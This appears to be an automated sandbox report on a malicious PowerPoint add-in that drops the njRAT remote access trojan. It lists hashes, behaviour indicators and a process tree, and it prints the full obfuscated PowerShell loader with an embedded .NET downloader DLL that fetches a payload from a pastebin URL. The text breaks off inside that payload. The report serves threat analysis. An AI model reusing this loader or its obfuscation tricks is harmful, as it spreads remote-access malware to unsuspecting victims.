File name:

Documentos.ppam

Full analysis: https://app.any.run/tasks/3c2b04eb-08ac-4081-addf-6b9683e0322d
Verdict: Malicious activity
Threats:

njRAT is a remote access trojan. It is one of the most widely accessible RATs on the market that features an abundance of educational information. Interested attackers can even find tutorials on YouTube. This allows it to become one of the most popular RATs in the world.

Analysis date: June 28, 2022, 09:55:27
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
rat
njrat
bladabindi
Indicators:
MIME: application/vnd.openxmlformats-officedocument.presentationml.presentation
File info: Microsoft PowerPoint 2007+
MD5:

1A5AB39ECF526A79B4CD098A1D16DE82

SHA1:

5AA7E093A288028C6FE433EC7F679D93651FA218

SHA256:

38F04E48C23DBA3596D1773C81CCA0ABD21A4CAEB635D079ED3EFCDAE193C1BD

SSDEEP:

768:VPRFtKPxrf6KCNFESpyN72d4AXhbGc2oPGxzP8IRizg6hX+e0iX/:VJHKdeESpyR+RbTPKE7gLe5P

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • POWERPNT.EXE (PID: 1912)
    • Executes scripts

      • POWERPNT.EXE (PID: 1912)
    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 3236)
      • cmd.exe (PID: 3244)
    • Writes to a start menu file

      • cmd.exe (PID: 3244)
    • NJRAT was detected

      • RegAsm.exe (PID: 2088)
    • Connects to CnC server

      • RegAsm.exe (PID: 2088)
  • SUSPICIOUS

    • Checks supported languages

      • WScript.exe (PID: 1332)
      • powershell.exe (PID: 2284)
      • powershell.exe (PID: 2448)
      • cmd.exe (PID: 3244)
      • cmd.exe (PID: 3236)
      • RegAsm.exe (PID: 2088)
    • Reads the computer name

      • WScript.exe (PID: 1332)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2284)
      • RegAsm.exe (PID: 2088)
    • Executes PowerShell scripts

      • powershell.exe (PID: 2448)
      • WScript.exe (PID: 1332)
    • Application launched itself

      • powershell.exe (PID: 2448)
    • Starts CMD.EXE for self-deleting

      • powershell.exe (PID: 2284)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2284)
    • Reads Environment values

      • powershell.exe (PID: 2284)
      • RegAsm.exe (PID: 2088)
    • Creates files in the user directory

      • cmd.exe (PID: 3244)
  • INFO

    • Reads the computer name

      • POWERPNT.EXE (PID: 1912)
      • PING.EXE (PID: 3372)
      • PING.EXE (PID: 3384)
    • Checks supported languages

      • POWERPNT.EXE (PID: 1912)
      • PING.EXE (PID: 3372)
      • PING.EXE (PID: 3384)
    • Reads mouse settings

      • POWERPNT.EXE (PID: 1912)
    • Creates files in the user directory

      • POWERPNT.EXE (PID: 1912)
    • Checks Windows Trust Settings

      • POWERPNT.EXE (PID: 1912)
      • WScript.exe (PID: 1332)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2284)
    • Reads settings of System Certificates

      • POWERPNT.EXE (PID: 1912)
      • WScript.exe (PID: 1332)
      • powershell.exe (PID: 2284)
      • RegAsm.exe (PID: 2088)
    • Reads Microsoft Office registry keys

      • POWERPNT.EXE (PID: 1912)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.ppam | PowerPoint Macro-enabled Open XML add-in (65.8)
.zip | Open Packaging Conventions container (27.7)
.zip | ZIP compressed archive (6.3)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0xf9ba2dfc
ZipCompressedSize: 268
ZipUncompressedSize: 488
ZipFileName: [Content_Types].xml
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
9
Malicious processes
4
Suspicious processes
2

Behavior graph

Click at the process to see the details
start powerpnt.exe wscript.exe powershell.exe no specs powershell.exe cmd.exe cmd.exe no specs ping.exe no specs ping.exe no specs #NJRAT regasm.exe

Process information

PID
CMD
Path
Indicators
Parent process
1912"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\admin\AppData\Local\Temp\Documentos.ppam"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
Explorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft PowerPoint
Version:
14.0.6009.1000
Modules
Images
c:\program files\microsoft office\office14\powerpnt.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\ppcore.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1332"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\bFvBy.vbs" C:\Windows\System32\WScript.exe
POWERPNT.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2448"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JцшеBGцшеHcцшеaQBlцшеHEцшеIцшецше9цшеCцшецшеJwцшеlцшеEkцшеRgBVцшеE0цшеTgцшеlцшеCcцшеOwцшеkцшеEIцшеRQBpцшеHMцшеQQцшеgцшеD0цшеIцшецшеnцшеCUцшеYQBCцшеGQцшеSQBwцшеCUцшеJwцше7цшеFsцшеQgB5цшеHQцшеZQBbцшеF0цшеXQцшеgцшеCQцшеeцшеBEцшеEoцшеbwBBцшеCцшецшеPQцшеgцшеFsцшеUwB5цшеHMцшеdцшеBlцшеG0цшеLgBDцшеG8цшеbgB2цшеGUцшеcgB0цшеF0цшеOgцше6цшеEYцшеcgBvцшеG0цшеQgBhцшеHMцшеZQцше2цшеDQцшеUwB0цшеHIцшеaQBuцшеGcцшеKцшецшеgцшеCQцшеRgB3цшеGkцшеZQBxцшеCцшецшеKQцше7цшеFsцшеUwB5цшеHMцшеdцшеBlцшеG0цшеLgBBцшеHцшецшеcцшеBEцшеG8цшеbQBhцшеGkцшеbgBdцшеDoцшеOgBDцшеHUцшеcgByцшеGUцшеbgB0цшеEQцшеbwBtцшеGEцшеaQBuцшеC4цшеTцшеBvцшеGEцшеZцшецшеoцшеCцшецшеJцшеB4цшеEQцшеSgBvцшеEEцшеIцшецшеpцшеC4цшеRwBlцшеHQцшеVцшеB5цшеHцшецшеZQцшеoцшеCcцшеQwBsцшеGEцшеcwBzцшеEwцшеaQBiцшеHIцшеYQByцшеHkцшеMwцшеuцшеEMцшеbцшеBhцшеHMцшеcwцшеxцшеCcцшеKQцшеuцшеEcцшеZQB0цшеE0цшеZQB0цшеGgцшеbwBkцшеCgцшеJwBSцшеHUцшеbgцшеnцшеCkцшеLgBJцшеG4цшеdgBvцшеGsцшеZQцшеoцшеCQцшеbgB1цшеGwцшеbцшецшеsцшеCцшецшеWwBvцшеGIцшеagBlцшеGMцшеdцшеBbцшеF0цшеXQцшеgцшеCgцшеJwBUцшеFgцшеTQBGцшеDkцшеdцшеBCцшеFQцшеLwB3цшеGEцшеcgцшеvцшеG0цшеbwBjцшеC4цшеbgBpцшеGIцшеZQB0цшеHMцшеYQBwцшеC8цшеLwцше6цшеHMцшеcцшеB0цшеHQцшеaцшецшеnцшеCwцшеIцшецшеnцшеFQцшеcgB1цшеGUцшеJwцшеsцшеCцшецшеJwBGцшеEsцшеWgBWцшеFgцшеJwцшеsцшеCцшецшеJwBUцшеHIцшеdQBlцшеCcцшеLцшецшеgцшеCQцшеQgBFцшеGkцшеcwBBцшеCцшецшеKQцшеpцшецше==';$uDFil = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('цше','A') ) ).replace('%aBdIp%', 'C:\Users\admin\AppData\Local\Temp\bFvBy.vbs' ).replace('%IFUMN%','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AENvbnRleHRWYWx1ZWAxAFRocmVhZFNhZmVPYmplY3RQcm92aWRlcmAxAENsYXNzMQBDbGFzc0xpYnJhcnkzAGdldF9VVEY4ADxNb2R1bGU+AFQAREZXb1kARGlzcG9zZV9fSW5zdGFuY2VfXwBDcmVhdGVfX0luc3RhbmNlX18AUHJvamVjdERhdGEAbXNjb3JsaWIATWljcm9zb2Z0LlZpc3VhbEJhc2ljAExvYWQAU3luY2hyb25pemVkAEdldE1ldGhvZABSZXBsYWNlAENyZWF0ZUluc3RhbmNlAGdldF9HZXRJbnN0YW5jZQBkZWZhdWx0SW5zdGFuY2UAaW5zdGFuY2UAR2V0SGFzaENvZGUASW52b2tlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAEFwcFdpblN0eWxlAFNlY3VyaXR5UHJvdG9jb2xUeXBlAEdldFR5cGUAZ2V0X0N1bHR1cmUAc2V0X0N1bHR1cmUAcmVzb3VyY2VDdWx0dXJlAE1ldGhvZEJhc2UAQXBwbGljYXRpb25CYXNlAEFwcGxpY2F0aW9uU2V0dGluZ3NCYXNlAFN0clJldmVyc2UARWRpdG9yQnJvd3NhYmxlU3RhdGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBIZWxwS2V5d29yZEF0dHJpYnV0ZQBHZW5lcmF0ZWRDb2RlQXR0cmlidXRlAERlYnVnZ2VyTm9uVXNlckNvZGVBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBFZGl0b3JCcm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAFN0YW5kYXJkTW9kdWxlQXR0cmlidXRlAEhpZGVNb2R1bGVOYW1lQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBEZWJ1Z2dlckhpZGRlbkF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAE15R3JvdXBDb2xsZWN0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAGdldF9WYWx1ZQBzZXRfVmFsdWUAR2V0T2JqZWN0VmFsdWUASnNLdmUAc2V0X0VuY29kaW5nAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcARnJvbUJhc2U2NFN0cmluZwBEb3dubG9hZFN0cmluZwBUb1N0cmluZwBHZXRGb2xkZXJQYXRoAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABDbGFzc0xpYnJhcnkzLmRsbABTaGVsbABzZXRfU2VjdXJpdHlQcm90b2NvbABTeXN0ZW0AcmVzb3VyY2VNYW4AVG9Cb29sZWFuAFN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24AQXBwRG9tYWluAGdldF9DdXJyZW50RG9tYWluAGdldF9BcHBsaWNhdGlvbgBNeUFwcGxpY2F0aW9uAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAEludGVyYWN0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAEV4Y2VwdGlvbgBSdW4ATWV0aG9kSW5mbwBDdWx0dXJlSW5mbwBLdGlwbwBUQURjcgBtX0FwcE9iamVjdFByb3ZpZGVyAG1fVXNlck9iamVjdFByb3ZpZGVyAG1fQ29tcHV0ZXJPYmplY3RQcm92aWRlcgBtX015V2ViU2VydmljZXNPYmplY3RQcm92aWRlcgBTcGVjaWFsRm9sZGVyAGdldF9SZXNvdXJjZU1hbmFnZXIAU2VydmljZVBvaW50TWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBnZXRfVXNlcgBnZXRfQ29tcHV0ZXIATXlDb21wdXRlcgBDbGVhclByb2plY3RFcnJvcgBTZXRQcm9qZWN0RXJyb3IAQWN0aXZhdG9yAC5jdG9yAC5jY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMAZ2V0X1dlYlNlcnZpY2VzAE15V2ViU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLk15LlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLlJlc291cmNlcy5yZXNvdXJjZXMARGVidWdnaW5nTW9kZXMAU3RyaW5ncwBnZXRfU2V0dGluZ3MATXlTZXR0aW5ncwBSZWZlcmVuY2VFcXVhbHMAQ29udmVyc2lvbnMAUnVudGltZUhlbHBlcnMAQ29uY2F0AE9iamVjdABNeVByb2plY3QAU3lzdGVtLk5ldABnZXRfRGVmYXVsdABXZWJDbGllbnQARW52aXJvbm1lbnQAQ29udmVydABTeXN0ZW0uVGV4dABtX0NvbnRleHQAaVFNQnUAQ2xhc3NMaWJyYXJ5My5NeQBnZXRfQXNzZW1ibHkATXlTZXR0aW5nc1Byb3BlcnR5AAAAL0MAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBSAGUAcwBvAHUAcgBjAGUAcwAAT2MAbQBkAC4AZQB4AGUAIAAvAGMAIABwAGkAbgBnACAAMQAyADcALgAwAC4AMAAuADEAIAAtAG4AIAA1ACAAJgAgAGMAbwBwAHkAIAAiAAEHIgAgACIAAANcAAALLgB2AGIAcwAiAABNYwBtAGQALgBlAHgAZQAgAC8AYwAgAHAAaQBuAGcAIAAxADIANwAuADAALgAwAC4AMQAgAC0AbgAgADcAIAAmACAAZABlAGwAIAAiAAEDIgAAQ1AAQQBiADUAZgB0ADcAMgAvAHcAYQByAC8AbQBvAGMALgBuAGkAYgBlAHQAcwBhAHAALwAvADoAcwBwAHQAdABoAAAFAyYDJgEDQQAARUMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsAABdcAHYANAAuADAALgAzADAAMwAxADkAAClDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4AQwBsAGEAcwBzADEAAAdSAHUAbgAAF1wAUgBlAGcAQQBzAG0ALgBlAHgAZQAAAAAAzI9aL6rCbEyiG4fNrFFp4AAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECBSACAQ4OBSABARFBByAEAQ4ODg4GFRIoARIMBhUSKAESCAYVEigBEmEGFRIoARIkBCAAEwAFAAICHBwHAAESaRGAjQUgABKAkQcgAgEOEoCRCAABEoCVEoCVCgcGDg4ODg4SgIkEAAECDgYAAQ4RgKUFAAEOHQ4JAAQIDhGArQIIBgADDg4ODgYAAQERgLUFAAASgL0GIAEBEoC9BAABDg4EIAEODgUgAg4ODgUAAg4ODgUAABKAxQUAAR0FDgcgARKAkR0FBSABEmkOBiABEoDNDgYgAhwcHRwGAAEBEoCJAwAAAQQAARwcBCABAhwDIAAIAyAADgQHAR4AAh4ABRABAB4ABAoBHgAEBwETAAYVEigBEwAHBhUSbQETAAYVEm0BEwACEwAECgETAAUgAQETAAi3elxWGTTgiQiwP19/EdUKOgcGFRIoARIMBwYVEigBEggHBhUSKAESYQcGFRIoARIkAwYSfQQGEoCBAwYSGAQAABIMBAAAEggEAAASYQQAABIkBAAAEn0FAAASgIEGAAEBEoCBBAAAEhgIAAUBDg4ODg4EIAASaQcQAQEeAB4ABzABAQEQHgAECAASDAQIABIIBAgAEmEECAASJAQIABJ9BQgAEoCBBAgAEhgEKAATAAgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAFAQAAAAApAQAkRTMxRjJDRDYtMEIzQi00M0RELUI2NzAtNzEwOUYwQzcwMzNDAAAMAQAHMS4wLjAuMAAASQEAGi5ORVRGcmFtZXdvcmssVmVyc2lvbj12NC41AQBUDhRGcmFtZXdvcmtEaXNwbGF5TmFtZRIuTkVUIEZyYW1ld29yayA0LjUEAQAAAAgBAAEAAAAAABgBAApNeVRlbXBsYXRlCDExLjAuMC4wAABBAQAzU3lzdGVtLlJlc291cmNlcy5Ub29scy5TdHJvbmdseVR5cGVkUmVzb3VyY2VCdWlsZGVyCDE2LjAuMC4wAABZAQBLTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5FZGl0b3JzLlNldHRpbmdzRGVzaWduZXIuU2V0dGluZ3NTaW5nbGVGaWxlR2VuZXJhdG9yCDE2LjIuMC4wAABhAQA0U3lzdGVtLldlYi5TZXJ2aWNlcy5Qcm90b2NvbHMuU29hcEh0dHBDbGllbnRQcm90b2NvbBJDcmVhdGVfX0luc3RhbmNlX18TRGlzcG9zZV9fSW5zdGFuY2VfXwAAABABAAtNeS5Db21wdXRlcgAAEwEADk15LkFwcGxpY2F0aW9uAAAMAQAHTXkuVXNlcgAAEwEADk15LldlYlNlcnZpY2VzAAAQAQALTXkuU2V0dGluZ3MAAAAAtAAAAM7K774BAAAAkQAAAGxTeXN0ZW0uUmVzb3VyY2VzLlJlc291cmNlUmVhZGVyLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkjU3lzdGVtLlJlc291cmNlcy5SdW50aW1lUmVzb3VyY2VTZXQCAAAAAAAAAAAAAABQQURQQURQtAAAAAAAAABEiyueAAAAAAIAAAB5AAAAPDwAADweAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAUlNEU0y66M9q/RZPhVvqU+tFgs0BAAAAQzpcVXNlcnNccGpvYW9cRGVza3RvcFxVcENyeVxNZXRvZG8gREZcQ2xhc3NMaWJyYXJ5M1xDbGFzc0xpYnJhcnkzXG9ialxSZWxlYXNlXENsYXNzTGlicmFyeTMucGRiAN08AAAAAAAAAAAAAPc8AAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADpPAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAA7AIAAAAAAAAAAAAA7AI0AAAAVgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBEwCAAABAFMAdA